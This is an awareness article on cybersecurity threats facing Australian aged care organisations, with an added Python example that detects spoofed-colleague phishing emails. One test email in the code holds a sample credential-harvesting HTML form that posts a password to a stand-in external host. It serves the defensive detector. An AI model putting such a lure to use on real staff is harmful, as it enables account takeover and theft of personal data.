Sooner or later the data held by an Australian aged care organisation will be systematically exploited by criminals, and it could be yours, writes Robert Merkel.
Aged care might seem an unlikely target, but in fact, for a different breed of hacker, aged care facilities are some of the most inviting targets possible. Cybercriminals attack IT systems for profit, and the information held on aged care IT systems is highly lucrative.
One way criminal hackers can make money out of an organisation’s IT systems is simply to hold the information stored on them to ransom. Recently, a hospital in California paid the equivalent of $23,000 in Bitcoin (an electronic currency that can be used to make anonymous internet payments) to the controllers of “ransomware” software that had infected their systems.
The ransomware software used encryption to turn the hospital’s patient records into gibberish, and the only way to regain access was with the electronic key held by the ransomware controllers. After 10 days without access, the hospital ultimately paid the ransom.
Gaining access to resident, family, and staff records, without altering them, can be more lucrative still. Aged care facilities have extensive personal information about their residents, family members, and staff. Such information – in the hands of criminals – can be used to commit identity fraud. As the Australian Federal Police explain, identity fraudsters can use personal information about people to:
- steal directly from them
- impersonate them to banks to obtain credit
- claim government benefits to which they are not entitled
On well-organised, global black markets, illegally obtained personal details are sold to those who exploit them for identity fraud. Because of the extent and high accuracy of the information held by aged care providers, it is particularly valuable on those markets.
Identity fraud can be devastating to victims; not only can they face large financial losses, their ability to conduct the basic financial transactions of daily life – open a bank account, get a credit card, or buy a mobile phone – can be severely disrupted for years to come.
Would you be happy to put your clients, their families, and your staff at such a risk? Imagine what it would do to your organisation’s reputation if it emerged that you were responsible for the data loss that enabled criminals to victimise your stakeholders. Do you want the Office of the Australian Information Commissioner, the responsible government body, investigating your data protection measures in the wake of a breach?
Many ways to steal data
Hackers use a wide variety of techniques to gain unauthorised access to systems and data – while all involve technical considerations, the human factor is also key.
An IBM report on data breaches in the healthcare sector revealed the most common techniques by which hackers gain unauthorised access to information. The most dangerous threat of all is the technical attack using a “0-day exploit” – in short, taking advantage of a flaw in software that is known to the attackers but for which no patch yet exists. However, data breaches are not typically caused by 0-days. The vast majority of “technical” data breaches come from exploiting well-known weaknesses in old or poorly configured software, and these can be avoided by keeping software up to date and configured correctly.
Even so, the most common causes of data breaches were exploitation of human weakness rather than technical weakness. “Phishing” scams attempt to trick users into revealing passwords, which hackers then use to log into systems. Modern “spearphishing” scams are often targeted at specific organisations, or at individuals within them. One common tactic is to send staff an email that purports to come from a colleague – either by “spoofing” the colleague’s address or by gaining access to their account. The email carries an attachment that asks the user to enter their account details to view it. If somebody falls for the scam and enters their login information, it is immediately sent to the hackers, who take control of the staff member’s account.
Image caption: Never open an attachment you suspect is part of a phishing scam; special precautions were taken even to capture the picture shown here. Even this relatively unsophisticated phishing scam compromised the internal university account from which it was sent.
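The spoofed-colleague email described above leaves traces that a mail gateway or a reviewer can check mechanically. The following is an added example, not code from the article or its author: it parses a raw message and flags the indicators the text describes (a From address on the organisation’s own domain that did not pass SPF or DKIM, a Reply-To pointing elsewhere, and an HTML attachment that asks for a password). The two messages, the domain `agedcare-example.com.au` and all names in them are constructed for the example; the checks are illustrative heuristics, not a complete phishing filter.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample: a spear-phishing email imitating an internal colleague.
# Every address, domain and name here is invented for this example.
RAW_PHISH = b"""From: "Jane Citizen" <jane.citizen@agedcare-example.com.au>
Reply-To: jane.citizen.docs@mail-example.net
To: staff@agedcare-example.com.au
Subject: Resident care plan - please review
Authentication-Results: mx.agedcare-example.com.au; spf=fail smtp.mailfrom=mail-example.net; dkim=none
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Hi, please open the attached document and log in to view it.
--b1
Content-Type: text/html; name="Care_Plan.html"
Content-Disposition: attachment; filename="Care_Plan.html"

<html><body><form action="https://mail-example.net/login" method="post">
Username <input name="user"> Password <input name="pass" type="password">
</form></body></html>
--b1--
"""

# Constructed sample: a genuine internal email that should produce no findings.
RAW_LEGIT = b"""From: "Jane Citizen" <jane.citizen@agedcare-example.com.au>
To: staff@agedcare-example.com.au
Subject: Roster for next week
Authentication-Results: mx.agedcare-example.com.au; spf=pass smtp.mailfrom=agedcare-example.com.au; dkim=pass header.d=agedcare-example.com.au
Content-Type: text/plain

Roster is on the intranet as usual.
"""

INTERNAL_DOMAIN = "agedcare-example.com.au"  # assumed organisation domain
RISKY_ATTACHMENT_SUFFIXES = (".html", ".htm", ".shtml")


def _domain(addr: str) -> str:
    """Return the lower-cased domain part of an email address ('' if none)."""
    return addr.rpartition("@")[2].lower()


def analyse(raw: bytes, internal_domain: str = INTERNAL_DOMAIN) -> list[str]:
    """Return a list of human-readable phishing indicators found in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[str] = []

    _, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_domain, reply_domain = _domain(from_addr), _domain(reply_addr)

    # Replies being diverted to a different domain than the visible sender.
    if reply_addr and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")

    # A message claiming to be from our own domain should have passed SPF or DKIM
    # at our gateway; a spoofed colleague address normally fails both.
    auth = msg.get("Authentication-Results", "").lower()
    if from_domain == internal_domain and "spf=pass" not in auth and "dkim=pass" not in auth:
        findings.append("claims internal sender but neither SPF nor DKIM passed")

    # HTML attachments are a common way to deliver a fake login page that
    # posts the victim's credentials to the attacker.
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_ATTACHMENT_SUFFIXES):
            findings.append(f"HTML attachment {name!r} (common credential-harvesting lure)")
            body = part.get_content().lower()
            if "<form" in body and "password" in body:
                findings.append(f"attachment {name!r} contains a password form")

    return findings


def is_suspicious(raw: bytes) -> bool:
    """True if any indicator fires; a gateway would quarantine or tag the message."""
    return bool(analyse(raw))


if __name__ == "__main__":
    for label, raw in (("phish", RAW_PHISH), ("legit", RAW_LEGIT)):
        print(label, "->", analyse(raw) or "no findings")
```

The `Authentication-Results` header is only trustworthy when it was written by your own inbound gateway, so a real deployment strips any copy of that header arriving from outside before adding its own; this example assumes the header is already trusted.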
Simplest of all, but still often very effective, is the ignoble art of “dumpster-diving” – that is, sifting through rubbish to find thrown-out computers with still-functioning hard disks full of private information. Fully 25 per cent of the data breaches reported in the IBM survey were due to dumpster diving and other physical losses of confidential data.
Information security is everyone’s responsibility
Given the variety of ways in which hackers can access confidential data, the job of keeping them out cannot be left entirely to IT staff and suppliers. Keeping data protected requires an organisation-wide strategy, including organisation-wide policies, training, and auditing.
None of this is free, and there is no immediate payoff for doing so. But, sooner or later, the data held by an Australian aged care organisation will be systematically exploited by criminals. Wouldn’t you prefer it not to be yours?
Robert Merkel is a lecturer in software engineering at Monash University.